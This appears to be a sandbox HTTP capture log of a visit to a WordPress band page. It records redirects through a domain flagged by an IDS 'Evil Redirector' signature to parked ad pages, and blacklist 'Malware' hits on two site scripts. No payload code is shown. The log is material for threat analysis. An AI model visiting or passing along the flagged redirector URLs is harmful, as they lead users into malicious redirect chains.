                                            GET /snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com HTTP/1.1 
Host: kfc.i.illuminationes.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://theforestsessions.com/redooen/about/

                                         
                                         103.224.182.252
HTTP/1.1 302 Found
Content-Type: text/html; charset=UTF-8
                                        
Date: Mon, 10 Jun 2019 14:37:36 GMT
Server: Apache/2.4.25 (Debian)
Set-Cookie: __tad=1560177456.8794177; expires=Thu, 07-Jun-2029 14:37:36 GMT; Max-Age=315360000
Location: http://ww25.kfc.i.illuminationes.com/snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com
Content-Length: 0
Connection: close


--- Additional Info ---

Alerts:
  IDS:
    - ET CURRENT_EVENTS Evil Redirector Sep 29 2015
                                        
                                            GET /redooen/wp-content/themes/weaver-ii/js/weaverjslib.min.js?ver=2.1.12 HTTP/1.1 
Host: theforestsessions.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://theforestsessions.com/redooen/about/
Cookie: 60gpBAK=R1224190331; 60gp=R2337348221; PHPSESSID=fcf404e00c4c88ba233c8611e7468caf

                                         
                                         213.186.33.19
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Set-Cookie: 60gp=R2337348221; path=/; expires=Mon, 10-Jun-2019 15:38:46 GMT
Date: Mon, 10 Jun 2019 14:37:37 GMT
Server: Apache
Last-Modified: Tue, 19 Aug 2014 09:27:32 GMT
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Mon, 10 Jun 2019 14:52:37 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3756
X-IPLB-Instance: 17329


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   3756
Md5:    ab75262c837996b521e44eef9d2a9d7f
Sha1:   7eaf6cd654b234fd0a3d46ada5e994e3242d814f
Sha256: bf1be47ca23c8a85ce512f5614be193b7666f6663d2633ac6c44ecd14b7423e3

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /redooen/wp-includes/js/wp-embed.min.js?ver=4.7.13 HTTP/1.1 
Host: theforestsessions.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://theforestsessions.com/redooen/about/
Cookie: 60gpBAK=R1224190331; 60gp=R2337348221; PHPSESSID=fcf404e00c4c88ba233c8611e7468caf

                                         
                                         213.186.33.19
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Set-Cookie: 60gp=R2337348221; path=/; expires=Mon, 10-Jun-2019 15:57:05 GMT
Date: Mon, 10 Jun 2019 14:37:37 GMT
Server: Apache
Last-Modified: Fri, 21 Apr 2017 12:27:57 GMT
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Mon, 10 Jun 2019 14:52:37 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 751
X-IPLB-Instance: 5182


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   751
Md5:    7542039ce963ffd18ad4fb7be13bd2be
Sha1:   8385e433e8e65739fc27b6bd16b1a7ae71b11084
Sha256: a70bca1336a4ac7592ce631cbb22c9ebb01d60461d221ac7a46f91a4ccfd1255

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            POST /gsdomainvalsha2g2 HTTP/1.1 
Host: ocsp2.globalsign.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 111
Content-Type: application/ocsp-request

                                         
                                         151.101.194.133
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Expires: Fri, 14 Jun 2019 13:59:23 GMT
X-Powered-By: Undertow/1
Etag: "89487d64d190fd9ccdf15be934c6af270547627b"
Last-Modified: Mon, 10 Jun 2019 13:59:23 GMT
Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
Via: 1.1 varnish, 1.1 varnish
Content-Length: 1562
Accept-Ranges: bytes
Date: Mon, 10 Jun 2019 14:37:37 GMT
Age: 2294
Connection: keep-alive
X-Served-By: cache-sin18020-SIN, cache-cph20621-CPH
X-Cache: HIT, MISS
X-Cache-Hits: 1, 0
X-Timer: S1560177457.309678,VS0,VE181


--- Additional Info ---
Magic:  data
Size:   1562
Md5:    83c88738e3a065607b30c23c52c43423
Sha1:   89487d64d190fd9ccdf15be934c6af270547627b
Sha256: fb2736a9cdec16b8dfff93addc52da56b4c5460aedde34fe1baba0cb2cdc1791
                                        
                                            GET /?&kw=Dedicated+Game+Server&KW1=Mobile%20Game%20Colocated%20Servers&KW2=PC%20Game%20Colocated%20Servers&KW3=Console%20Game%20Colocated%20Servers&KW4=Help%20Desk%20Ticket%20System&searchbox=0&domainname=0&backfill=0 HTTP/1.1 
Host: www12.teaserguide.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://theforestsessions.com/redooen/about/

                                         
                                         185.53.179.29
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Mon, 10 Jun 2019 14:37:37 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_oneclick
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   475
Md5:    bb30c7414a8b6081f4cfa742fd091cc0
Sha1:   c75763ab79c2185198e17b18f94a23d9a23fc886
Sha256: c7a03aa52170763d34f6c613edde523faacddede7996220de17c847cba4fb7df
                                        
                                            GET /snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com HTTP/1.1 
Host: kfc.i.illuminationes.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://theforestsessions.com/redooen/about/

                                         
                                         103.224.182.252
HTTP/1.1 302 Found
Content-Type: text/html; charset=UTF-8
                                        
Date: Mon, 10 Jun 2019 14:37:37 GMT
Server: Apache/2.4.25 (Debian)
Set-Cookie: __tad=1560177457.4474779; expires=Thu, 07-Jun-2029 14:37:37 GMT; Max-Age=315360000
Location: http://ww25.kfc.i.illuminationes.com/snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com
Content-Length: 0
Connection: close


--- Additional Info ---

Alerts:
  IDS:
    - ET CURRENT_EVENTS Evil Redirector Sep 29 2015
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Cache-Control: max-age=163218
Date: Mon, 10 Jun 2019 14:37:37 GMT
Etag: "5cfe27db-1d7"
Expires: Wed, 12 Jun 2019 11:57:55 GMT
Last-Modified: Mon, 10 Jun 2019 09:50:19 GMT
Server: ECS (lcy/1D22)
X-Cache: HIT
Content-Length: 471


--- Additional Info ---
Magic:  data
Size:   471
Md5:    fb2c94c6bf11b565f2154dc2bc4a6673
Sha1:   4bc7437a704d067f523424b311371b747900cf47
Sha256: 737849cea4036c69a6b863a010452c8afd240eae28764480994c77e7625fab58
                                        
                                            GET /themes/assets/style.css HTTP/1.1 
Host: d1lxhc4jvstzrp.cloudfront.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www12.teaserguide.com/?&kw=Dedicated+Game+Server&KW1=Mobile%20Game%20Colocated%20Servers&KW2=PC%20Game%20Colocated%20Servers&KW3=Console%20Game%20Colocated%20Servers&KW4=Help%20Desk%20Ticket%20System&searchbox=0&domainname=0&backfill=0

                                         
                                         143.204.51.134
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Mon, 10 Jun 2019 00:12:41 GMT
Last-Modified: Mon, 07 Jan 2019 10:07:22 GMT
Etag: W/"5c3324da-33d"
Content-Encoding: gzip
Vary: Accept-Encoding
Age: 51896
X-Cache: Hit from cloudfront
Via: 1.1 a6d89f7e2d55548b941f1ff5d5b3c8d4.cloudfront.net (CloudFront)
X-Amz-Cf-Id: BlrPCa5ZTjO4sGYiqhj86bRZnjwhYNQl19y_iYadfu2Zx3JwDicHmQ==


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   343
Md5:    c689d30608f974031e2c24c299c8dc4b
Sha1:   b483802c89db0131b6d7768a68c43e5ae411d601
Sha256: 78c58f7b6fb701d9644af4456df21dca0e90d09e88952227d6d178e8d4e5a386
                                        
                                            GET /themes/assets/skenzo.css HTTP/1.1 
Host: d1lxhc4jvstzrp.cloudfront.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www12.teaserguide.com/?&kw=Dedicated+Game+Server&KW1=Mobile%20Game%20Colocated%20Servers&KW2=PC%20Game%20Colocated%20Servers&KW3=Console%20Game%20Colocated%20Servers&KW4=Help%20Desk%20Ticket%20System&searchbox=0&domainname=0&backfill=0

                                         
                                         143.204.51.134
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sun, 09 Jun 2019 18:47:50 GMT
Last-Modified: Mon, 07 Jan 2019 10:07:22 GMT
Etag: W/"5c3324da-159"
Content-Encoding: gzip
Vary: Accept-Encoding
Age: 71387
X-Cache: Hit from cloudfront
Via: 1.1 8ddb6d7670d8c5a85c04a10525a71b91.cloudfront.net (CloudFront)
X-Amz-Cf-Id: tcvta_UBxnTlWKBdN9cyOLWGS0Y0qtyDOT_uHd3sS8T7BOG0aOLumg==


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   208
Md5:    c2fb482175c53a41861e41226fa2f029
Sha1:   602df898a184b1c5a26897fda150ad95a631423d
Sha256: d5667164154a9ee109c677a9a9d072c45bdf2787440f2174f4a6d484c98c644e
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Cache-Control: max-age=168893
Date: Mon, 10 Jun 2019 14:37:37 GMT
Etag: "5cfe4b0a-1d7"
Expires: Wed, 12 Jun 2019 13:32:30 GMT
Last-Modified: Mon, 10 Jun 2019 12:20:26 GMT
Server: ECS (lcy/1D69)
X-Cache: HIT
Content-Length: 471


--- Additional Info ---
Magic:  data
Size:   471
Md5:    f87e45c94c5677e569e10c29202dc35e
Sha1:   a18ad0405d3d1596586522be5474fe353990626d
Sha256: 46c3106d95f55de4ca3754e39fbbe5aef6329f4e82ddb28c80fd107c9a826a7c
                                        
                                            POST /GTSGIAG3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         216.58.207.227
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Mon, 10 Jun 2019 14:37:37 GMT
Cache-Control: public, max-age=86400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   471
Md5:    1339db3724b6fa602889ffbac0a5d886
Sha1:   97a578d6df0d30c21e77235ca7518bdb54742afd
Sha256: fb2db489f5d5297cb0ac5833236371d12296eadeeabcfe53a7dba09ee445b631
                                        
                                            POST /gsr2 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 112
Content-Type: application/ocsp-request

                                         
                                         216.58.207.227
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Mon, 10 Jun 2019 14:37:37 GMT
Cache-Control: public, max-age=86400
Server: ocsp_responder
Content-Length: 468
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   468
Md5:    5be872b3fe0bb6f31385f91f811e9586
Sha1:   1192231bcb9ee73e9f619d433cdb66dddd9ae7f7
Sha256: db0ad6191770bff9043482b68acf62a4e25d4390a03274cfbe413675dd8c9cf5
                                        
                                            GET /en_US/all.js?hash=25858875d50bccf0d2410dfbbdb4d5db HTTP/1.1 
Host: connect.facebook.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://theforestsessions.com/redooen/about/

                                         
                                         31.13.72.12
HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
                                        
Access-Control-Expose-Headers: X-FB-Content-MD5
x-fb-content-md5: bd9961b3f4129c336741d00f8ee308b7
Etag: "c5f5a6217f3c393435dd0d37942463b2"
Content-Encoding: gzip
Timing-Allow-Origin: *
Strict-Transport-Security: max-age=31536000; preload; includeSubDomains
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
Access-Control-Allow-Origin: *
Cache-Control: public,max-age=31536000,stale-while-revalidate=3600,immutable
Expires: Tue, 09 Jun 2020 13:18:20 GMT
Content-MD5: 4NW5k4SL+7AvkQShEBiF2A==
X-FB-Debug: 9vX7ro9lTM9PscX1OqLw3AmJI9Ff9O0uLfX3Lt8JtUvvxAfVlR/FPFmMGcnkbuGxgE+PzvWAsz+WkhAFlXUWUA==
Date: Mon, 10 Jun 2019 14:37:37 GMT
Connection: keep-alive
Content-Length: 58376


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   58376
Md5:    e0d5b993848bfbb02f9104a1101885d8
Sha1:   15256b43cc6173de7df1d953b3903075445a2ac8
Sha256: e391f0f4176a1123fc23af6a8187ad88757e4a2ce5b7beafb78e82cea72c519a
                                        
                                            GET /snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com HTTP/1.1 
Host: ww25.kfc.i.illuminationes.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://theforestsessions.com/redooen/about/

                                         
                                         199.59.242.151
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: openresty
Date: Mon, 10 Jun 2019 14:37:37 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IG7SHObzICYKHaBOUbC+jMeLDLR5s90PipG69dksYAn5Atc2WeM+jN0TYh0+vf0jbtmiBTCYdx5AeZ3RhVWVZA==


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   4028
Md5:    5e316cdcbcefc5a280fd83d5a776ba43
Sha1:   f58eb484a49cff055b373d68e3dc31b7581706ff
Sha256: d7f917314f16158af6778951585c28fae5412ddab6c306becfc049222af35615

Alerts:
  IDS:
    - ET CURRENT_EVENTS Evil Redirector Sep 29 2015
                                        
                                            GET /EmbeddedPlayer/album=2437981243/size=large/bgcol=333333/linkcol=ffffff/transparent=true/ HTTP/1.1 
Host: bandcamp.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://theforestsessions.com/redooen/about/

                                         
                                         151.101.193.28
HTTP/1.1 303 See Other
                                        
Server: nginx
Set-Cookie: client_id=271A8351083165313BD7D156A086D807455A5DE0624D8A7FD878B384DB7FCC7C; domain=.bandcamp.com; path=/; expires=Sun, 10 Jun 2029 14:37:37 -0000 BACKENDID=bender19-5; path=/; domain=.bandcamp.com
Location: https://bandcamp.com/EmbeddedPlayer.html/ref=http%253A%252F%252Ftheforestsessions.com%252Fredooen%252Fabout%252F/album=2437981243/size=large/bgcol=333333/linkcol=ffffff/transparent=true/
Accept-Ranges: bytes, bytes
Transfer-Encoding: chunked
Date: Mon, 10 Jun 2019 14:37:37 GMT
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: cache-osl6535-OSL
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1560177458.799277,VS0,VE166


--- Additional Info ---
Magic:  ASCII text, with very long lines, with no line terminators
Size:   442
Md5:    f15c5b9a3d323291edb1214f612d57d0
Sha1:   b2a8b6154efe19dddd0390b5a7fdbba50798cc9c
Sha256: 56e0e4d5904ad84db5e520588ed3addfb269d2633c3e77040611bf1b78356e20
                                        
                                            GET /adsense/domains/caf.js HTTP/1.1 
Host: www.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ww25.kfc.i.illuminationes.com/snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com

                                         
                                         172.217.21.164
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding
Date: Mon, 10 Jun 2019 14:37:37 GMT
Expires: Mon, 10 Jun 2019 14:37:37 GMT
Cache-Control: private, max-age=3600
Etag: "22394151573373752"
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: sffe
X-XSS-Protection: 0


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   56467
Md5:    a53d0e7d63593d3bba6787dbaaef3b4f
Sha1:   f079a5e8f40e28abdb7b3aab2e40b193f7a7dc7c
Sha256: 253bec1a2954ab39a97ee03ec1dddff4a700963ebca3d990420e2886c8e8b140
                                        
                                            GET /?dn=teaserguide.com&pid=9PO755G95 HTTP/1.1 
Host: iyfsearch.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www12.teaserguide.com/?&kw=Dedicated+Game+Server&KW1=Mobile%20Game%20Colocated%20Servers&KW2=PC%20Game%20Colocated%20Servers&KW3=Console%20Game%20Colocated%20Servers&KW4=Help%20Desk%20Ticket%20System&searchbox=0&domainname=0&backfill=0

                                         
                                         208.91.196.46
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Mon, 10 Jun 2019 14:37:37 GMT
Server: Apache
ntCoent-Length: 272
Keep-Alive: timeout=5, max=126
Connection: Keep-Alive
Cache-Control: private
Content-Encoding: gzip
Content-Length: 196


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   196
Md5:    b3392eae99c706d62b8b5d51821c1460
Sha1:   8dbb5025e07544e8a81b42add15d8d467c7c5c3d
Sha256: 9276990bc483362dfcf014a838c1e095c75ecf0ff9c71d39d305e2349899e41c
                                        
                                            GET /snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com HTTP/1.1 
Host: kfc.i.illuminationes.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://theforestsessions.com/redooen/about/

                                         
                                         103.224.182.252
HTTP/1.1 302 Found
Content-Type: text/html; charset=UTF-8
                                        
Date: Mon, 10 Jun 2019 14:37:37 GMT
Server: Apache/2.4.25 (Debian)
Set-Cookie: __tad=1560177457.8044908; expires=Thu, 07-Jun-2029 14:37:37 GMT; Max-Age=315360000
Location: http://ww25.kfc.i.illuminationes.com/snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com
Content-Length: 0
Connection: close


--- Additional Info ---

Alerts:
  IDS:
    - ET CURRENT_EVENTS Evil Redirector Sep 29 2015
                                        
                                            GET /snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com HTTP/1.1 
Host: ww25.kfc.i.illuminationes.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://theforestsessions.com/redooen/about/

                                         
                                         199.59.242.151
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: openresty
Date: Mon, 10 Jun 2019 14:37:37 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IG7SHObzICYKHaBOUbC+jMeLDLR5s90PipG69dksYAn5Atc2WeM+jN0TYh0+vf0jbtmiBTCYdx5AeZ3RhVWVZA==


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   4028
Md5:    5e316cdcbcefc5a280fd83d5a776ba43
Sha1:   f58eb484a49cff055b373d68e3dc31b7581706ff
Sha256: d7f917314f16158af6778951585c28fae5412ddab6c306becfc049222af35615

Alerts:
  IDS:
    - ET CURRENT_EVENTS Evil Redirector Sep 29 2015
                                        
                                            GET /embed/6H2EOmf_vJQ HTTP/1.1 
Host: www.youtube.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://theforestsessions.com/redooen/about/
Cookie: VISITOR_INFO1_LIVE=VDBjT-m9Syc; YSC=hEExb76W9tA

                                         
                                         172.217.20.46
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
P3P: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info."
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000
Content-Encoding: gzip
Date: Mon, 10 Jun 2019 14:37:37 GMT
Server: YouTube Frontend Proxy
X-XSS-Protection: 0
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Sun, 09-Feb-2020 02:30:37 GMT GPS=1; path=/; domain=.youtube.com; expires=Mon, 10-Jun-2019 15:07:37 GMT
Alt-Svc: quic=":443"; ma=2592000; v="46,44,43,39"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   19214
Md5:    9fc6d87f26e72fb6622bc03fccb6a0ae
Sha1:   4db45b1104115b560df819d53fa6b4fe92926315
Sha256: c3b893e27a7951a58410abea2b5c067e0b959bf5acc5fa09a05baa6fc108f68b
                                        
                                            GET /EmbeddedPlayer.html/ref=http%253A%252F%252Ftheforestsessions.com%252Fredooen%252Fabout%252F/album=2437981243/size=large/bgcol=333333/linkcol=ffffff/transparent=true/ HTTP/1.1 
Host: bandcamp.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://theforestsessions.com/redooen/about/
Cookie: client_id=271A8351083165313BD7D156A086D807455A5DE0624D8A7FD878B384DB7FCC7C; BACKENDID=bender19-5

                                         
                                         151.101.193.28
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Content-Encoding: gzip
Accept-Ranges: bytes, bytes
Age: 0, 0
Transfer-Encoding: chunked
Date: Mon, 10 Jun 2019 14:37:38 GMT
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: cache-osl6535-OSL
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1560177458.969690,VS0,VE174
